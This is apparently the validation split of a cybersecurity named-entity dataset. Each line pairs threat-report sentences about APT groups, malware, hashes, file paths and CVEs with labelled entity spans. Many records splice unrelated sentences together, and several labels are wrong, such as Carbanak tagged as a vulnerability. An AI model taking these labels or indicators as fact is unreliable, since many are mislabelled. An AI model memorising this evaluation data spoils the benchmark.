{"text": "The second campaign identifier , which we suspect may be related , is “ mod_ge_2009_07_03 ” from a month later and apparently targeting the Ministry of Defense of Georgia .", "spans": {"Organization: Ministry of Defense": [[140, 159]]}, "info": {"id": "cyberner_stix_valid_000707", "source": "cyberner_stix_valid"}}
{"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": {"Vulnerability: Carbanak": [[10, 18]], "Organization: banks": [[55, 60]], "Organization: electronic payment": [[65, 83]], "Organization: space": [[125, 130]], "Indicator: thanks.pps": [[158, 168]], "Indicator: ins8376.exe": [[232, 243]], "Indicator: mpro324.dll": [[276, 287]]}, "info": {"id": "cyberner_stix_valid_000708", "source": "cyberner_stix_valid"}}
{"text": "The threat actor made some modifications to the original source code of hTran . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": {"Organization: activists": [[240, 249]]}, "info": {"id": "cyberner_stix_valid_000709", "source": "cyberner_stix_valid"}}
{"text": "] cc/TiktokPro . Gamaredon Group is an alleged Russian threat group . Unlike standard Azazel which is configured to hide network activity based on port ranges , the Winnti modified version keeps a list of process identifiers and network connections associated with the malware ’s activity .", "spans": {"Malware: Winnti": [[165, 171]]}, "info": {"id": "cyberner_stix_valid_000710", "source": "cyberner_stix_valid"}}
{"text": "FireEye has not identified APT33 using SHAPESHIFT , but APT33 is the only group FireEye has seen to use DROPSHOT . As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules .", "spans": {"Organization: FireEye": [[0, 7], [80, 87]], "Malware: CnC-3 server": [[147, 159]], "System: Windows": [[168, 175]]}, "info": {"id": "cyberner_stix_valid_000711", "source": "cyberner_stix_valid"}}
{"text": "The activity discussed in this blog revolves around two of the multitude of weaponized documents that we collected .", "spans": {}, "info": {"id": "cyberner_stix_valid_000712", "source": "cyberner_stix_valid"}}
{"text": "URI TERROR ATTACK & KASHMIR PROTEST THEMED SPEAR PHISHING emails TARGETING INDIAN EMBASSIES AND INDIAN MINISTRY OF EXTERNAL AFFAIRS - CYSINFO .", "spans": {"Organization: INDIAN EMBASSIES": [[75, 91]], "Organization: INDIAN MINISTRY OF EXTERNAL AFFAIRS": [[96, 131]]}, "info": {"id": "cyberner_stix_valid_000713", "source": "cyberner_stix_valid"}}
{"text": "In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: individual": [[241, 251]]}, "info": {"id": "cyberner_stix_valid_000714", "source": "cyberner_stix_valid"}}
{"text": "This means the attackers can steal the victim ’ s credentials for logging into apps , SMS and email messages , displayed cryptocurrency private keys , and even software-generated 2FA codes . It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol (SMTP) credentials and email addresses in the victim’s machine . While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness .", "spans": {"Malware: RATs": [[663, 667]], "Malware: staging": [[672, 679]], "Malware: malware": [[680, 687]]}, "info": {"id": "cyberner_stix_valid_000715", "source": "cyberner_stix_valid"}}
{"text": "We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000716", "source": "cyberner_stix_valid"}}
{"text": "Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans . In early August , Unit 42 identified two attacks using similar techniques . In addition to ShadowPad , the Winnti malware was found on some machines at these two universities at the end of October ( i.e . two weeks before ShadowPad ) in the file C:\\Windows\\System32\\oci.dll and is detected by ESET products as Win64/Winnti.CA . Organizations evaluating their security posture and developing a risk based security framework would be well served to consider the various potential motivational related threats .", "spans": {"System: Kaspersky Lab": [[0, 13]], "Organization: Unit 42": [[96, 103]], "Malware: ShadowPad": [[169, 178], [300, 309]], "Malware: Winnti": [[185, 191]], "Indicator: C:\\Windows\\System32\\oci.dll": [[324, 351]], "Organization: ESET": [[371, 375]], "Organization: Organizations": [[406, 419]]}, "info": {"id": "cyberner_stix_valid_000717", "source": "cyberner_stix_valid"}}
{"text": "The malware creates an Intent inside the decryption function using the string value passed as the name for the Intent . During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks . The ZIP file had a file size significantly greater than that of its uncompressed . These threats can come from internal employees , vendors , a contractor or a partnerand are viewed as some of the greatest cyber security threats to organizations .", "spans": {"Organization: FireEye": [[195, 202]], "Organization: internal employees": [[421, 439]], "Organization: vendors": [[442, 449]], "Organization: contractor": [[454, 464]], "Organization: partnerand": [[470, 480]], "Organization: organizations": [[542, 555]]}, "info": {"id": "cyberner_stix_valid_000718", "source": "cyberner_stix_valid"}}
{"text": "The \" source process '' refers to the Zen trojan running as root , while the \" target process '' refers to the process to which the code is injected and [ pid ] refers to the target process pid value . We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries . APT17 went further to obfuscate their C2 IP address and employed a multi-layered approach for the malware to finally beacon the true C2 IP . These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": {"Malware: Zen": [[38, 41]], "Organization: industrial": [[263, 273]], "Organization: engineering": [[276, 287]], "Organization: manufacturing organizations": [[292, 319]]}, "info": {"id": "cyberner_stix_valid_000719", "source": "cyberner_stix_valid"}}
{"text": "Figure 5 . We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 . JhoneRAT is developed in python but not based on public source code , as it is often the case for this type of malware . In that campaign , the attackers also targeted the government of a Middle Eastern country , a multinational electronics manufacturer , and a hospital in Southeast Asia .", "spans": {"Malware: JhoneRAT": [[212, 220]], "Organization: government of a Middle Eastern country": [[384, 422]], "Organization: multinational electronics manufacturer": [[427, 465]], "Organization: hospital in Southeast Asia": [[474, 500]]}, "info": {"id": "cyberner_stix_valid_000720", "source": "cyberner_stix_valid"}}
{"text": "Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . The pop-out window is just smoke and mirrors , where nothing actually happens once the countdown timer reaches zero .", "spans": {}, "info": {"id": "cyberner_stix_valid_000721", "source": "cyberner_stix_valid"}}
{"text": "If Google Play Protect detects one of these apps , Google Play Protect will show a warning to users . The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV . The threat actors then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . That DLL file is the main module of Miniduke , and it uses the URL http://twitter.com/TamicaCGerald to fetch commands .", "spans": {"System: Google Play Protect": [[3, 22], [51, 70]], "Organization: SPEAR": [[127, 132]], "Malware: hcdLoader": [[272, 281]], "System: Windows": [[308, 315]]}, "info": {"id": "cyberner_stix_valid_000722", "source": "cyberner_stix_valid"}}
{"text": "Once installed , HenBox steals information from the devices from a myriad of sources , including many mainstream chat , communication , and social media apps . The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"Malware: HenBox": [[17, 23]], "Organization: G20": [[290, 293]], "Organization: FireEye": [[420, 427]], "Vulnerability: exploit": [[503, 510]], "Organization: Microsoft Office": [[511, 527]], "Vulnerability: vulnerabilities": [[528, 543]], "Malware: LOWBALL": [[594, 601]]}, "info": {"id": "cyberner_stix_valid_000723", "source": "cyberner_stix_valid"}}
{"text": "] com hxxp : //mailsa-qaw [ . Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism . Glimpse added the ability to use an alternate DNS resource record type (TXT) as opposed to solely relying on A resource records for DNS . None Deploy advanced endpoint detection and response ( EDR ) tools to all endpoints to detect web services spawning PowerShell or command line processes .", "spans": {"Malware: Glimpse": [[254, 261]]}, "info": {"id": "cyberner_stix_valid_000724", "source": "cyberner_stix_valid"}}
{"text": "Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": {"Malware: spam emails": [[20, 31]], "Organization: banks": [[96, 101]], "Malware: self-extracting RAR": [[175, 194]], "Indicator: Loader.dll": [[256, 266]], "Indicator: readme.txt": [[284, 294]]}, "info": {"id": "cyberner_stix_valid_000725", "source": "cyberner_stix_valid"}}
{"text": "Attacks launched by Scarlet Mimic were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": {"Organization: Trend Micro": [[69, 80]], "Indicator: Trojan": [[146, 152]]}, "info": {"id": "cyberner_stix_valid_000726", "source": "cyberner_stix_valid"}}
{"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland .", "spans": {"Organization: Dragos": [[0, 6]], "Organization: oil": [[186, 189]], "Organization: gas industries": [[194, 208]], "Organization: Kessem": [[224, 230]], "Organization: banks": [[279, 284]], "Organization: community banks": [[356, 371]], "Organization: email service providers": [[376, 399]]}, "info": {"id": "cyberner_stix_valid_000727", "source": "cyberner_stix_valid"}}
{"text": "he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name .", "spans": {"Organization: Tibetan community": [[3, 20]], "Malware: Baidu search engine": [[241, 260]]}, "info": {"id": "cyberner_stix_valid_000728", "source": "cyberner_stix_valid"}}
{"text": "As already stated in the ‘ malware features ’ part , there are multiple giveaways in the code . This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"Malware: Panda Banker": [[142, 154]], "Organization: financial institutions": [[190, 212]], "Organization: media organizations": [[313, 332]]}, "info": {"id": "cyberner_stix_valid_000729", "source": "cyberner_stix_valid"}}
{"text": "Of these , the campaign with the identifier “ kaz_2010_07_30 ” , which possibly targeted Kazakhstan , is of note because it is the last PinchDuke campaign we have observed .", "spans": {"Malware: PinchDuke": [[136, 145]]}, "info": {"id": "cyberner_stix_valid_000730", "source": "cyberner_stix_valid"}}
{"text": "To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a malicious payload in the background .", "spans": {"Organization: Facebook": [[230, 238]], "Organization: social engineering": [[284, 302]]}, "info": {"id": "cyberner_stix_valid_000731", "source": "cyberner_stix_valid"}}
{"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques . . On April 16 , 2022 , KillNet dedicated its attack on a U.S. energy company to REvil .", "spans": {"Organization: banks": [[328, 333]], "Organization: budgeting": [[359, 368]], "Organization: accounting departments": [[373, 395]], "Organization: U.S. energy company": [[543, 562]]}, "info": {"id": "cyberner_stix_valid_000732", "source": "cyberner_stix_valid"}}
{"text": "cv.doc : f4d18316e367a80e1005f38445421b1f . cv_itworx.doc : 45b0e5a457222455384713905f886bd4 . cv_mci.doc : f4d18316e367a80e1005f38445421b1f . discount_voucher_codes.xlsm : 19cea065aa033f5bcfa94a583ae59c08 .", "spans": {"Indicator: cv.doc": [[0, 6]], "Indicator: f4d18316e367a80e1005f38445421b1f": [[9, 41], [108, 140]], "Indicator: cv_itworx.doc": [[44, 57]], "Indicator: 45b0e5a457222455384713905f886bd4": [[60, 92]], "Indicator: cv_mci.doc": [[95, 105]], "Indicator: discount_voucher_codes.xlsm": [[143, 170]], "Indicator: 19cea065aa033f5bcfa94a583ae59c08": [[173, 205]]}, "info": {"id": "cyberner_stix_valid_000733", "source": "cyberner_stix_valid"}}
{"text": "Back then it was detected as Trojan-Spy.AndroidOS.SmsThief , but later versions were assigned to another family – Trojan-Banker.AndroidOS.Rotexy . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity .", "spans": {"Malware: Trojan-Spy.AndroidOS.SmsThief": [[29, 58]], "Malware: Trojan-Banker.AndroidOS.Rotexy": [[114, 144]], "Malware: decoy documents": [[251, 266]], "Organization: DHS": [[307, 310]], "Organization: FBI": [[315, 318]]}, "info": {"id": "cyberner_stix_valid_000734", "source": "cyberner_stix_valid"}}
{"text": "Figure 1 shows the infection rate for each of the targets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000735", "source": "cyberner_stix_valid"}}
{"text": "We classify this 40-month period into three main stages . This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper . Dexphot is not the type of attack that generates mainstream media attention ; it ’s one of the countless malware campaigns that are active at any given time . • Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": {"Malware: Dexphot": [[217, 224]]}, "info": {"id": "cyberner_stix_valid_000736", "source": "cyberner_stix_valid"}}
{"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"Organization: oil": [[387, 390]], "Organization: gas": [[393, 396]], "Organization: petrochemical companies": [[403, 426]], "Organization: executives": [[456, 466]]}, "info": {"id": "cyberner_stix_valid_000737", "source": "cyberner_stix_valid"}}
{"text": "Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": {"Malware: stylecss.aspx": [[68, 81]], "Malware: China Chopper": [[153, 166]], "Indicator: malicious.DOC": [[255, 268]], "Vulnerability: exploit": [[278, 285]], "Organization: Microsoft": [[288, 297]], "Vulnerability: vulnerability": [[314, 327]], "Vulnerability: CVE-2012-0158": [[330, 343]]}, "info": {"id": "cyberner_stix_valid_000738", "source": "cyberner_stix_valid"}}
{"text": "“ Agent Smith ” currently uses its broad access to the device ’ s resources to show fraudulent ads for financial gain . The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server . It ’s unclear whether the hackers are purchasing the exploits and spyware together , directly from Gamma Group , or if they were able to acquire some of the tools through other avenues . “ BlackOasis ’ interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region . MoonWind communicates over ports 80 , 443 , 53 , and 8080 via raw sockets instead of the protocols usually associated with the ports.[25 ] njRAT has used port 1177 for HTTP C2 communications.[26 ] During Operation Wocao , the threat actors used uncommon high ports for its backdoor C2 , including ports 25667 and 47000.[27 ]", "spans": {"Malware: Agent Smith": [[2, 13]], "Malware: spyware": [[376, 383]], "Malware: MoonWind": [[645, 653]], "Malware: njRAT": [[784, 789]], "System: HTTP C2 communications.[26": [[813, 839]], "System: backdoor C2": [[918, 929]]}, "info": {"id": "cyberner_stix_valid_000739", "source": "cyberner_stix_valid"}}
{"text": "Facebook profile of the C & C domain registrar ( cover picture and profile picture edited out ) Linked on the malicious developer ’ s Facebook profile , we discovered a Facebook page , Minigameshouse , and an associated domain , minigameshouse [ . Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . SHA256 : 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 .", "spans": {"Organization: Facebook": [[0, 8], [134, 142], [169, 177]], "Malware: Pony malware": [[350, 362]], "Malware: pm.dll”": [[365, 372]], "Indicator: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635": [[421, 485]]}, "info": {"id": "cyberner_stix_valid_000740", "source": "cyberner_stix_valid"}}
{"text": "Messages sent from ORat to its command and control ( C2 ) server start with the string \"VIEWS0018x\" .", "spans": {"Malware: ORat": [[19, 23]]}, "info": {"id": "cyberner_stix_valid_000741", "source": "cyberner_stix_valid"}}
{"text": "Once granted permission , it hides its icon from the launcher application list then starts a service that it keeps running in the background . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . These parameters are needed to self-decrypt the “ uninstall.exe ” file which is again another SFX archive .", "spans": {"Indicator: uninstall.exe": [[290, 303]]}, "info": {"id": "cyberner_stix_valid_000742", "source": "cyberner_stix_valid"}}
{"text": "It impersonates a porn player app or MMS application but without having their functionality . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000743", "source": "cyberner_stix_valid"}}
{"text": "These routines are indicative of the group ’s aim to get quantitative returns through varied cybercriminal profit streams .", "spans": {}, "info": {"id": "cyberner_stix_valid_000744", "source": "cyberner_stix_valid"}}
{"text": "We therefore believe that the Dukes group simply failed to update the computer they were using to compile GeminiDuke samples , so that the timestamps seen in later samples still appear to follow the old definition of Moscow Standard Time .", "spans": {"Malware: GeminiDuke": [[106, 116]]}, "info": {"id": "cyberner_stix_valid_000745", "source": "cyberner_stix_valid"}}
{"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": {"Vulnerability: CVE-2018-8174": [[81, 94]], "Indicator: Careto": [[131, 137]]}, "info": {"id": "cyberner_stix_valid_000746", "source": "cyberner_stix_valid"}}
{"text": "According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials .", "spans": {"Organization: aerospace": [[131, 140]], "Organization: telecommunications": [[143, 161]], "Organization: finance industries": [[168, 186]], "Organization: Palo Alto Networks": [[189, 207]], "Malware: Infy": [[379, 383], [431, 435]], "Malware: Infy M.": [[388, 395]], "Malware: non-M": [[438, 443]], "Malware: malware": [[446, 453]], "Malware: keylogger": [[487, 496]]}, "info": {"id": "cyberner_stix_valid_000747", "source": "cyberner_stix_valid"}}
{"text": "The campaign identifiers found in these two samples are respectively , “ alkavkaz.com20081105 ” and “ cihaderi.net20081112 ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000748", "source": "cyberner_stix_valid"}}
{"text": "In this case the persistence is achieved by loading the original explorer.exe from its startup location and , using DLL side-loading , passing the execution control to the stage 4 malware ( discussed in next section ) . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East . 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Malware/Backdoor 658 KB ( 674 , 304 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": {"Indicator: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[348, 412]], "System: Windows": [[480, 487]], "Organization: Intel": [[508, 513]], "Malware: COSMICENERGY": [[544, 556]]}, "info": {"id": "cyberner_stix_valid_000749", "source": "cyberner_stix_valid"}}
{"text": "Timing of the spear phishing emails sent to the victims .", "spans": {}, "info": {"id": "cyberner_stix_valid_000750", "source": "cyberner_stix_valid"}}
{"text": "The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements – developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": {"Indicator: exploit code": [[122, 134]]}, "info": {"id": "cyberner_stix_valid_000751", "source": "cyberner_stix_valid"}}
{"text": "As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": {"Malware: MiniDuke": [[69, 77]]}, "info": {"id": "cyberner_stix_valid_000752", "source": "cyberner_stix_valid"}}
{"text": "What it does FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym – Nymaim – appear up to the task . APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently . Whether known as commodity malware or “ as - a - service , ” threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": {"Malware: FrozenCell": [[13, 23]], "System: Facebook": [[78, 86]], "System: WhatsApp": [[89, 97]], "System: Messenger": [[100, 109]], "System: LINE": [[112, 116]], "System: LoveChat": [[123, 131]], "Organization: bank": [[273, 277]], "Organization: Kessem": [[313, 319]], "Malware: BISCUIT": [[422, 429]], "Malware: commodity malware": [[506, 523]]}, "info": {"id": "cyberner_stix_valid_000753", "source": "cyberner_stix_valid"}}
{"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies . The attacks appear to be geopolitically motivated and target high profile organizations .", "spans": {"Organization: specific individuals": [[247, 267]], "Organization: institutions": [[272, 284]], "Organization: military": [[303, 311]], "Organization: intelligence agencies": [[328, 349]], "Organization: government": [[362, 372]], "Organization: high profile organizations": [[443, 469]]}, "info": {"id": "cyberner_stix_valid_000754", "source": "cyberner_stix_valid"}}
{"text": "Some of the checks performed previously are immediately sent to the C2 , like the safetyNet , admin and defaultSMSApp . Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC . DUDELL : SHA256 : 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e . The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": {"Organization: Norman": [[195, 201]], "Organization: Kaspersky": [[204, 213]], "Organization: FireEye": [[216, 223]], "Organization: PwC": [[230, 233]], "Malware: DUDELL": [[236, 242]], "Indicator: 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e": [[254, 318]], "Organization: Progress": [[509, 517]]}, "info": {"id": "cyberner_stix_valid_000755", "source": "cyberner_stix_valid"}}
{"text": "This feature is implemented using another open-source software package that can be found here . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . APT12 's targets are consistent with larger People's Republic of China ( PRC ) goals . Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis / parsing of network data .", "spans": {"Vulnerability: zero day exploit": [[248, 264]], "Vulnerability: CVE-2014-4148": [[267, 280]], "Organization: People's Republic of China": [[327, 353]], "Organization: PRC": [[356, 359]]}, "info": {"id": "cyberner_stix_valid_000756", "source": "cyberner_stix_valid"}}
{"text": "While actors from China , Iran , Russia , and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye , APT32 reflects a growing host of new countries that have adopted this dynamic capability . The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": {"Organization: FireEye": [[133, 140]], "Organization: Muslim activists": [[371, 387]], "Organization: Russian government": [[429, 447]]}, "info": {"id": "cyberner_stix_valid_000757", "source": "cyberner_stix_valid"}}
{"text": "For example , if a victim has Viber on their device , it will choose to retrieve the Viber Update second stage . The attackers first infected in March 2017 . This function is the entry point of the service . As nations committed to upholding the rules - based international order in cyberspace , the United States and its allies and partners are taking steps to defend against Russia ’s irresponsible actions .", "spans": {"System: Viber": [[30, 35]], "System: Viber Update": [[85, 97]], "Organization: the United States": [[296, 313]]}, "info": {"id": "cyberner_stix_valid_000758", "source": "cyberner_stix_valid"}}
{"text": "spear phishing : 5.254.100.200 .", "spans": {"Indicator: 5.254.100.200": [[17, 30]]}, "info": {"id": "cyberner_stix_valid_000759", "source": "cyberner_stix_valid"}}
{"text": "therefore , those using CosmicDuke to target drug dealers and those targeting governments are two separate entities .", "spans": {"Malware: CosmicDuke": [[24, 34]]}, "info": {"id": "cyberner_stix_valid_000760", "source": "cyberner_stix_valid"}}
{"text": "In later versions , instead of the name of the command , its numerical code was transmitted . CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples . Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed . For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence ’s website .", "spans": {"Organization: CTU": [[94, 97]], "Organization: Kaspersky": [[157, 166]]}, "info": {"id": "cyberner_stix_valid_000761", "source": "cyberner_stix_valid"}}
{"text": "Based on our investigations into OnionDuke , we believe that for about 7 months , from April 2014 to when Leviathan published their blog post in October 2014 , the Tor exit node identified by the researchers was being used to wrap executables on-the-fly with OnionDuke ( image 7 , page 13 ) .", "spans": {"Malware: OnionDuke": [[33, 42], [259, 268]], "Organization: Leviathan": [[106, 115]]}, "info": {"id": "cyberner_stix_valid_000762", "source": "cyberner_stix_valid"}}
{"text": ") As of this writing , no files were hosted at any of the links . In addition , the attackers employed hacking tools of Chinese origin and that are prevalent on Chinese underground hacking forums . Threat : Gamaredon Pteranodon implant SFX archive . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": {"Malware: Pteranodon": [[217, 227]]}, "info": {"id": "cyberner_stix_valid_000763", "source": "cyberner_stix_valid"}}
{"text": "Once X-Agent was implanted on the DNC and DCCC networks , Second Lieutenant Artem Malyshev ( AKA \" djangomagicdev \" and \" realblatr \" ) monitored the implants through the command and control network configured for the task .", "spans": {"Malware: X-Agent": [[5, 12]]}, "info": {"id": "cyberner_stix_valid_000764", "source": "cyberner_stix_valid"}}
{"text": "The legitimate version of this app is also available on Google Play . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . ScarCruft infected this victim on September 21, 2018 .", "spans": {"System: Google Play": [[56, 67]], "Organization: Kaspersky": [[70, 79]]}, "info": {"id": "cyberner_stix_valid_000765", "source": "cyberner_stix_valid"}}
{"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"Organization: Mandiant": [[28, 36]], "Malware: services.exe": [[132, 144]], "Malware: Poison Ivy RAT": [[206, 220]], "Malware: WinHTTPHelper": [[225, 238]], "Malware: malware": [[239, 246]], "Organization: government officials": [[278, 298]]}, "info": {"id": "cyberner_stix_valid_000766", "source": "cyberner_stix_valid"}}
{"text": "For now , the best protection is to avoid any APK attachments that arrive on mobile phones via e-mail . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle .", "spans": {"Vulnerability: CVE-2012-0158": [[185, 198]], "Malware: Clayslide samples": [[256, 273]]}, "info": {"id": "cyberner_stix_valid_000767", "source": "cyberner_stix_valid"}}
{"text": "At the beginning of February 2018 , we discovered an attack targeting two government institutions related to foreign affairs .", "spans": {}, "info": {"id": "cyberner_stix_valid_000768", "source": "cyberner_stix_valid"}}
{"text": "The cluster on the right is actually collapsing one collection of entities due to the sheer size of it .", "spans": {}, "info": {"id": "cyberner_stix_valid_000769", "source": "cyberner_stix_valid"}}
